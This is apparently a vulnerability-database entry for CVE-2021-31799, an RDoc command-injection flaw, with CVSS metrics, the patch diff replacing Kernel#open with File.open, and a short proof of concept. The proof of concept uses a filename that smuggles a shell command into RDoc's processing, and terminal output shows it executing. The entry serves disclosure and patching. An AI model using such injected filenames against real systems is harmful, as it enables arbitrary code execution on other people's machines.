Attacker Value
High
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
0

CVE-2021-31799

Disclosure Date: July 30, 2021
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Initial Access
Techniques
Validation
Validated

Description

In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.

Add Assessment

2
Ratings
Technical Analysis

CVE-2021-31799

Perlisms strike again in this RDoc command injection. Kernel#open is not safe.

Patch

File is lib/rdoc/rdoc.rb.

   ##
   # Removes file extensions known to be unparseable from +files+ and TAGS
   # files for emacs and vim.

   def remove_unparseable files
     files.reject do |file, *|
       file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i or
         (file =~ /tags$/i and
-         open(file, 'rb') { |io|
+         File.open(file, 'rb') { |io|
            io.read(100) =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/
          })
     end
   end

PoC

wvu@kharak:~/Downloads/poc$ cat vulnerable
cat: vulnerable: No such file or directory
wvu@kharak:~/Downloads/poc$ touch "| echo HACK THE PLANET > vulnerable # tags"
wvu@kharak:~/Downloads/poc$ rdoc
Parsing sources...
100% [ 1/ 1]  | echo HACK THE PLANET > vulnerable # tags

Generating Darkfish format into /Users/wvu/Downloads/poc/doc...

  Files:      1

  Classes:    0 (0 undocumented)
  Modules:    0 (0 undocumented)
  Constants:  0 (0 undocumented)
  Attributes: 0 (0 undocumented)
  Methods:    0 (0 undocumented)

  Total:      0 (0 undocumented)
    0.00% documented

  Elapsed: 0.1s

wvu@kharak:~/Downloads/poc$ cat vulnerable
HACK THE PLANET
wvu@kharak:~/Downloads/poc$
CVSS V3 Severity and Metrics
Base Score:
7.0 High
Impact Score:
5.9
Exploitability Score:
1
Vector:
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
High
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • debian,
  • oracle,
  • ruby-lang

Products

  • debian linux 10.0,
  • debian linux 9.0,
  • jd edwards enterpriseone tools,
  • rdoc
Technical Analysis